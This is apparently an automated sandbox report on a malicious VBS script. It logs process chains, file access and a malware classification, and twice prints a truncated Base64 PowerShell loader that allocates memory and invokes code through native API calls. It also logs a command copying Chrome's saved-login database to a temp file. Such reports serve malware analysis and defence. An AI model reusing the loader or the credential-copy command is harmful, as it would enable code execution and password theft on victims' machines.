AXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARgBlAGoAZQBtADAALAB1AGkAbgB0ACAARgBlAGoAZQBtADEALABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABGAGUAagBlAG0AMwAsAGkAbgB0ACAARgBlAGoAZQBtADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQA1ACwAaQBuAHQAIABGAGUAagBlAG0ANgAsAGkAbgB0ACAARgBlAGoAZQBtADcALABpAG4AdAAgAEYAZQBqAGUAbQA4ACwAaQBuAHQAIABGAGUAagBlAG0AOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBCAGUAcgBpAGcAbgBpAG4AZwAgAGIAYQBsAHUAcwB0ACAARgBqAGUAcgB0ACAAUwBwAGwAaQBuAHQAcgBpADcAIABNAGUAbABhAG4AaQBzAHQAcwAgAFYASQBDAEUAVQBEAEUATgBSAEkAIABuAGUAdAB0AG8AdgByAGQAIABNAEEARwBTAFYARQBKAFIAQwBMACAATQBpAHIAawBvAHMAdQAgAEMAbwBjAGsAZgBpAGcAaAB0AGEAIABjAG8AcABwAGUAcgBlACAATwBQAEUATABTAEsAIABCAEoAUgBOAEUAVQBOACAASABhAGcAZQBkAGUAcwBtADcAIABmAGEAcgByACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBvAGIAagBlAGsAdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAE8ATABLAEUAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMwA9ADAAOwANAAoAJABiAGkAZAByAGEAZwBzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAYgBpAGQAcgBhAGcAcwA4AD0AWwBiAGkAZAByAGEAZwBzADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5835.tmp" "c:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBSAHYAZQBuACAAUABBAFAAQQBQACAAcwBhAHcAYgBlAGwAbAB5AHUAbgAgAFIAaQBjAGEAcgBkAHQANQAgAE8ASwBTAEIATwBOAE4ARQBUAEwAIABTAEMASQBFACAAYwBoAGkAbgBhAG4AdABhAHMAIABOAG8AbgBzACAATwBzAGEAbQBpAG4AZQAgAEIAYQB0AHQAYQBsAGkAYQAyACAASABvAHYAZQBkAHAANAAgAHAAcgBvAGYAZQBzAHMAaQAgAG4AYQBuAGEAawBvAGwAIABlAG4AcwBpAGwAZQByAGUAawBsACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAGkAZAByAGEAZwBzADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABiAGkAZAByAGEAZwBzADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEEAdQB4AGEAbQB5AGwAYQBzAGUALABpAG4AdAAgAEYAZQBqAGUAbQAsAHIAZQBmACAASQBuAHQAMwAyACAAYgBpAGQAcgBhAGcAcwAsAGkAbgB0ACAASABPAEMASwBFAFkASwBBAE0AUAAsAGkAbgB0ACAAYgBpAGQAcgBhAGcAcwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFMAZQBtAGkAZwBsAHUAdAA3ACwAdQBpAG4AdAAgAEEAVABUAEUAUwBUAEUALABpAG4AdAAgAEUAdABpAGsAZQB0ADkALABpAG4AdAAgAGIAaQBkAHIAYQBnAHMAMAAsAGkAbgB0ACAAYgBlAGwAbABlAHYALABpAG4AdAAgAEIAdQBsAGQAcgByACwAaQBuAHQAIABGAE8ATABLAEUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARgBlAGoAZQBtADAALAB1AGkAbgB0ACAARgBlAGoAZQBtADEALABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABGAGUAagBlAG0AMwAsAGkAbgB0ACAARgBlAGoAZQBtADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQA1ACwAaQBuAHQAIABGAGUAagBlAG0ANgAsAGkAbgB0ACAARgBlAGoAZQBtADcALABpAG4AdAAgAEYAZQBqAGUAbQA4ACwAaQBuAHQAIABGAGUAagBlAG0AOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBCAGUAcgBpAGcAbgBpAG4AZwAgAGIAYQBsAHUAcwB0ACAARgBqAGUAcgB0ACAAUwBwAGwAaQBuAHQAcgBpADcAIABNAGUAbABhAG4AaQBzAHQAcwAgAFYASQBDAEUAVQBEAEUATgBSAEkAIABuAGUAdAB0AG8AdgByAGQAIABNAEEARwBTAFYARQBKAFIAQwBMACAATQBpAHIAawBvAHMAdQAgAEMAbwBjAGsAZgBpAGcAaAB0AGEAIABjAG8AcABwAGUAcgBlACAATwBQAEUATABTAEsAIABCAEoAUgBOAEUAVQBOACAASABhAGcAZQBkAGUAcwBtADcAIABmAGEAcgByACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBvAGIAagBlAGsAdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAE8ATABLAEUAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMwA9ADAAOwANAAoAJABiAGkAZAByAGEAZwBzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAYgBpAGQAcgBhAGcAcwA4AD0AWwBiAGkAZAByAGEAZwBzADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAY
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5835.tmp" "c:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP"
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220113Jump to behavior
      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\FORSVARL.datJump to behavior
      Source: classification engineClassification label: mal100.troj.spyw.evad.winVBS@25/17@2/2
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6452:120:WilError_01
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_01
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\MTIR22024323_0553381487_20220112120005.vbs"
      Source: C:\Windows\SysWOW64\cmstp.exeFile written: C:\Users\user\AppData\Roaming\O118090C\O11logri.iniJump to behavior
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\explorer.exe
      Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\explorer.exe
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected